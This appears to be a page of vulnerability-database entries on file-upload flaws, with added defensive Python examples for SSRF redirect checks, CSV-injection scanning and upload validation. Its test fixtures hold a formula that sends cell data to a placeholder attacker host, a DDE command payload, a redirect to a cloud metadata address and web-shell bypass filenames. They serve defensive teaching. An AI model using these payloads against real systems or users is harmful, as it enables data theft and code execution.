52 matches found
EUVD-2026-8467
Payload is a free and open source headless content management system. Prior to 3.75.0, a Server-Side Request Forgery (SSRF) vulnerability exists in Payload's external file upload functionality. When processing external URLs for file uploads, insufficient validation of HTTP redirects could allow an...
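Added example, not Payload's code, of the check the entry above says was insufficient: when a server fetches a user-supplied URL, the destination has to be validated again on every redirect hop, because a public host can answer with a 302 to a loopback, RFC 1918 or link-local address such as a cloud metadata endpoint. The DNS table and canned responses are constructed fixtures so the block runs offline; the hostnames and addresses are placeholders, not real services.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 5
SHARED_ADDRESS_SPACE = ipaddress.ip_network("100.64.0.0/10")   # RFC 6598; not covered by is_private


def is_public_address(addr):
    """True only for globally routable unicast addresses; loopback, RFC 1918,
    link-local (cloud metadata) and IPv4-mapped IPv6 forms are all False."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                      # judge ::ffff:10.0.0.1 as 10.0.0.1
    if ip.version == 4 and ip in SHARED_ADDRESS_SPACE:
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def system_resolver(host):
    """Every address the name maps to, so a mixed public/private answer is caught."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_url(url, resolver=system_resolver):
    """Raise ValueError unless url is http(s) to a host whose addresses are all public."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    try:
        addresses = [str(ipaddress.ip_address(host))]   # literal address, no lookup needed
    except ValueError:
        addresses = resolver(host)
    if not addresses:
        raise ValueError(f"host does not resolve: {host}")
    for addr in addresses:
        if not is_public_address(addr):
            raise ValueError(f"{host} resolves to non-public address {addr}")
    return host


def url_is_acceptable(url, resolver=system_resolver):
    try:
        validate_url(url, resolver)
        return True
    except ValueError:
        return False


def fetch_external(url, send, resolver=system_resolver, max_redirects=MAX_REDIRECTS):
    """send(url) -> (status, headers, body) must perform ONE request and must not
    follow redirects itself. Every hop, including the first, is validated first."""
    hops = []
    for _ in range(max_redirects + 1):
        validate_url(url, resolver)
        hops.append(url)
        status, headers, body = send(url)
        if status not in REDIRECT_CODES:
            return status, body, hops
        location = headers.get("location") or headers.get("Location")
        if not location:
            raise ValueError("redirect without Location header")
        url = urljoin(url, location)          # relative Location resolves against the current hop
    raise ValueError("too many redirects")


# Constructed fixtures (placeholder names and addresses, not real services).
FAKE_DNS = {
    "cdn.example.com": ["93.184.216.34"],
    "files.example.net": ["151.101.1.67"],
    "localhost": ["127.0.0.1"],
    "rebind.example.org": ["93.184.216.34", "10.0.0.5"],   # one public, one private answer
}
FAKE_RESPONSES = {
    "https://cdn.example.com/avatar.png": (302, {"location": "/v2/avatar.png"}, b""),
    "https://cdn.example.com/v2/avatar.png": (307, {"location": "https://files.example.net/avatar.png"}, b""),
    "https://files.example.net/avatar.png": (200, {}, b"\x89PNG\r\n\x1a\n"),
    "https://cdn.example.com/evil.png": (302, {"location": "http://169.254.169.254/latest/meta-data/"}, b""),
}


def fake_resolver(host):
    return FAKE_DNS.get(host, [])


def fake_send(url):
    return FAKE_RESPONSES[url]


def run_example():
    """Outcome of a benign two-redirect chain and of a redirect to the metadata service."""
    ok = fetch_external("https://cdn.example.com/avatar.png", fake_send, fake_resolver)
    try:
        fetch_external("https://cdn.example.com/evil.png", fake_send, fake_resolver)
        blocked = None
    except ValueError as exc:
        blocked = str(exc)
    return ok, blocked
```

Two caveats for real use: the `send` callable must be configured not to follow redirects on its own (for the requests library that is allow_redirects=False), otherwise the per-hop check never runs; and resolving a name, checking it, then letting the HTTP client resolve it again leaves a DNS rebinding window, so a hardened fetcher connects to the address it validated and supplies the hostname separately for the Host header and SNI.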
PT-2025-52717
Name of the Vulnerable Software and Affected Versions: ProjectSend version r1605 Description: ProjectSend r1605 contains a remote code execution issue that allows attackers to upload malicious files by manipulating file extensions. Attackers can upload shell scripts with disguised extensions throug...
PT-2025-5744 · Ckan · Ckan
Name of the Vulnerable Software and Affected Versions: CKAN versions prior to 2.10.7 and 2.11.2 Description: CKAN is an open-source data management system for powering data hubs and data portals. A user could potentially upload a file containing code that, when executed, could send arbitrary...
PT-2025-5229 · Innovative Solutions · Innovative Solutions User Files
Name of the Vulnerable Software and Affected Versions: Innovative Solutions user files versions n/a through 2.4.2 Description: The issue allows an unrestricted upload of files with dangerous types, enabling the upload of a web shell to a web server. This can potentially allow attackers to upload...
PT-2025-2880 · Adportal · Adportal
Name of the Vulnerable Software and Affected Versions: AdPortal version 3.0.39 Description: A remote attacker can execute arbitrary code via the file upload functionality due to a File Upload Bypass issue. This allows attackers to bypass file upload checks and run arbitrary code. Recommendations:...
PT-2024-17661 · WordPress · Svg Shortcode
Name of the Vulnerable Software and Affected Versions: SVG Shortcode plugin for WordPress versions up to, and including, 1.0.1 Description: The issue is related to Stored Cross-Site Scripting via SVG File uploads due to insufficient input sanitization and output escaping. This allows...
PT-2024-20701 · Ibm · Ibm Cognos Controller
Name of the Vulnerable Software and Affected Versions: IBM Cognos Controller versions 11.0.0 through 11.0.1 Description: The issue concerns a malicious file upload vulnerability due to the lack of validation of the type of file uploaded to Journal entry attachments. Attackers can exploit this...
PT-2024-35775 · Taiga · Taiga
Name of the Vulnerable Software and Affected Versions: Taiga version 6.8.1 Description: A CSV injection issue allows attackers to execute arbitrary code via a crafted CSV file: formulas embedded in the uploaded file are evaluated when the manipulated file is later opened in a spreadsheet application, enabling the execution of arbitrary code...
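Added example, not Taiga's code, of the mechanism behind the Taiga entry: a cell beginning with =, +, -, @ (or a tab or carriage return that hides one of those) is interpreted as a formula by the spreadsheet that opens the file, so the import side should flag such cells and the export side should neutralise them. The crafted CSV below is constructed for this example and the attacker hostname is a placeholder.

```python
import csv
import io

# Leading characters that make a spreadsheet evaluate a cell instead of displaying it
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(value):
    """True if the cell would be evaluated when the CSV is opened in a spreadsheet.
    Leading spaces are stripped first because some importers trim cells before parsing."""
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def scan_uploaded_csv(data):
    """Import side: (row, column, value) for every formula-bearing cell in an uploaded
    CSV, so the import can be refused or the cells quarantined. Row 0 is the header."""
    reader = csv.reader(io.StringIO(data.decode("utf-8-sig"), newline=""))
    return [(r, c, cell)
            for r, row in enumerate(reader)
            for c, cell in enumerate(row)
            if is_formula_cell(cell)]


def neutralize_cell(value):
    """Export side: prefix a formula-looking cell with an apostrophe so the spreadsheet
    stores it as text (the approach OWASP recommends for CSV injection)."""
    return "'" + value if is_formula_cell(value) else value


def export_csv(rows):
    """Write rows with every cell neutralised and quoted; embedded quotes are doubled."""
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return out.getvalue()


# Constructed sample of a crafted upload: a task list whose "subject" column carries
# a HYPERLINK that leaks the neighbouring cell, a DDE-style command, and a negative number.
CRAFTED_UPLOAD = (
    'subject,points\r\n'
    'Fix login bug,3\r\n'
    '"=HYPERLINK(""http://attacker.example/?""&A1,""click"")",5\r\n'
    '"@SUM(1+1)*cmd|\' /C calc\'!A0",2\r\n'
    '-2+3,1\r\n'
).encode("utf-8")
```

The last flagged row shows the known false positive: "-2+3" is a plain negative expression, and a column of negative numbers would be flagged too. Type the columns before scanning (numeric columns are parsed as numbers, not evaluated as formulas) or apply the check only to columns known to hold free text.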
PT-2024-34158 · Unknown · Instantcms
Name of the Vulnerable Software and Affected Versions: InstantCMS versions prior to 2.16.3 Description: The issue is related to a lack of input validation in the photo upload function on the photo album page, allowing attackers to inject and execute Cross-Site Scripting (XSS) payloads...
PT-2024-16265 · Sourcecodester · Sourcecodester Attendance/Payroll System
Name of the Vulnerable Software and Affected Versions: SourceCodester Attendance and Payroll System version 1.0 Description: A critical issue has been found in the upload function of the file /marimar/guest/update.php, allowing unrestricted upload through the manipulation of the image argument...
PT-2024-33566 · Unknown · Paxman Product Website Showcase
Name of the Vulnerable Software and Affected Versions: Paxman Product Website Showcase versions n/a through 1.0 Description: The issue allows an unrestricted upload of files with dangerous types, enabling the upload of a web shell to a web server. This can potentially allow attackers to deploy...
PT-2024-39321 · WordPress · Fonto
Name of the Vulnerable Software and Affected Versions: Fonto – Custom Web Fonts Manager plugin for WordPress versions up to, and including, 1.2.1 Description: The issue is related to Stored Cross-Site Scripting via SVG File uploads due to insufficient input sanitization and output escaping. This...
PT-2024-7096 · Adobe · Indesign Desktop
Name of the Vulnerable Software and Affected Versions: InDesign Desktop versions 19.4, 18.5.3 and earlier Description: The issue is related to an Unrestricted Upload of File with Dangerous Type, which could result in arbitrary code execution. An attacker could exploit this by uploading a maliciou...
PT-2024-27797 · Itsourcecode · Itsourcecode Online Discussion Forum Project
Name of the Vulnerable Software and Affected Versions: Itsourcecode Online Discussion Forum Project version 1.0 Description: The issue allows a remote attacker to execute arbitrary code via the "poster.php" file. The uploaded file is received using the $_FILES variable. This enables the attacker ...
PT-2024-32396 · Django +1 · Django +1
Name of the Vulnerable Software and Affected Versions: Strawberry GraphQL versions prior to 0.243.0 Description: The issue concerns Strawberry GraphQL, a library for creating GraphQL APIs. Prior to version 0.243.0, multipart file upload support was enabled by default in all Strawberry HTTP view...
PT-2024-18158 · WordPress · Ninja Forms - File Uploads
Name of the Vulnerable Software and Affected Versions: Ninja Forms - File Uploads plugin for WordPress versions up to, and including, 3.3.16 Description: The issue is a Stored Cross-Site Scripting vulnerability via an uploaded file, such as an RTX file, due to insufficient input sanitization and...
PT-2024-5487 · Admidio · Admidio
Name of the Vulnerable Software and Affected Versions: Admidio versions prior to 4.3.10 Description: A Remote Code Execution issue exists in the Message module of the Admidio Application. This is due to the lack of file extension verification, allowing malicious files to be uploaded to the server...
PT-2024-27653 · Zealousweb · Zealousweb Generate Pdf Using Contact Form 7
Name of the Vulnerable Software and Affected Versions: ZealousWeb Generate PDF using Contact Form 7 versions 4.0.6 and earlier Description: The issue is related to an Unrestricted Upload of File with Dangerous Type, which affects ZealousWeb Generate PDF using Contact Form 7. Recommendations: For...
PT-2024-22859 · Unknown · Volmarg Personal Management System
Name of the Vulnerable Software and Affected Versions: Volmarg Personal Management System version 1.4.64 Description: The Volmarg Personal Management System is vulnerable to Server-Side Request Forgery (SSRF) via uploading an SVG file. This allows the server to make unintended HTTP and DNS requests ...
PT-2024-4177 · Adobe · Commerce
Name of the Vulnerable Software and Affected Versions: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier Description: The issue is related to an Unrestricted Upload of File with Dangerous Type, which could result in arbitrary code execution. A high-privilege attacker could...
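Added example, not code from any listed vendor, of the upload check whose absence the ProjectSend, Innovative Solutions, AdPortal, SourceCodester, Itsourcecode, Admidio and Adobe Commerce entries describe: the client-trusting pattern those bypasses defeat (a short extension blocklist plus faith in the Content-Type header) is shown beside a check that allowlists the final extension, verifies the content's magic bytes against it, and never stores the file under a client-chosen name. The allowlist, signatures and size limit are assumptions made for this example; SVG is deliberately absent from the allowlist because it is XML and needs sanitising rather than a magic-byte check.

```python
import os
import unicodedata
import uuid

# Assumed policy: extension -> (served MIME type, magic bytes the content must start with).
# The on-disk extension comes from this table, never from the client.
ALLOWED_TYPES = {
    "png":  ("image/png",       [b"\x89PNG\r\n\x1a\n"]),
    "jpg":  ("image/jpeg",      [b"\xff\xd8\xff"]),
    "jpeg": ("image/jpeg",      [b"\xff\xd8\xff"]),
    "gif":  ("image/gif",       [b"GIF87a", b"GIF89a"]),
    "pdf":  ("application/pdf", [b"%PDF-"]),
}
MAX_UPLOAD_BYTES = 10 * 1024 * 1024


def vulnerable_is_allowed(filename, declared_content_type):
    """The pattern behind the listed bypasses: a blocklist of a few extensions plus trust
    in the client-supplied Content-Type. Defeated by shell.phtml, shell.php5,
    shell.php.jpg (Apache mod_mime handles every extension segment) or a spoofed header."""
    blocked = (".php", ".exe", ".sh")
    return (not filename.lower().endswith(blocked)
            and declared_content_type.startswith("image/"))


def validate_upload(filename, content, declared_content_type=None, name_factory=None):
    """Return (storage_name, mime) for an acceptable upload or raise ValueError.
    storage_name is server-generated: <random hex>.<validated extension>."""
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    if len(content) > MAX_UPLOAD_BYTES:
        raise ValueError("file too large")
    # Drop any client-supplied directory part (either separator), normalise Unicode,
    # and strip trailing dots/spaces that some filesystems silently remove
    base = os.path.basename(filename.replace("\\", "/"))
    base = unicodedata.normalize("NFKC", base).strip().rstrip(". ")
    if not base or "." not in base:
        raise ValueError("filename has no extension")
    ext = base.rsplit(".", 1)[1].lower()          # only the final extension counts
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"extension not allowed: .{ext}")
    mime, signatures = ALLOWED_TYPES[ext]
    if not any(content.startswith(sig) for sig in signatures):
        raise ValueError(f"content does not look like {mime}")
    # The declared type is advisory only, but a mismatch is still a reason to refuse
    if declared_content_type and declared_content_type.split(";")[0].strip().lower() != mime:
        raise ValueError(f"declared type {declared_content_type!r} does not match {mime}")
    random_name = (name_factory or (lambda: uuid.uuid4().hex))()
    return f"{random_name}.{ext}", mime


def check_upload(filename, content, declared_content_type=None):
    """Convenience wrapper: ('accepted', storage_name) or ('rejected', reason)."""
    try:
        name, _ = validate_upload(filename, content, declared_content_type)
        return ("accepted", name)
    except ValueError as exc:
        return ("rejected", str(exc))
```

A valid JPEG with PHP appended after the image data still passes the magic-byte check (that is the polyglot case), so the check is only one layer: the stored file gets a server-generated name with a validated extension, lives outside the web root or in object storage where nothing executes it, and is served with the validated Content-Type and X-Content-Type-Options: nosniff.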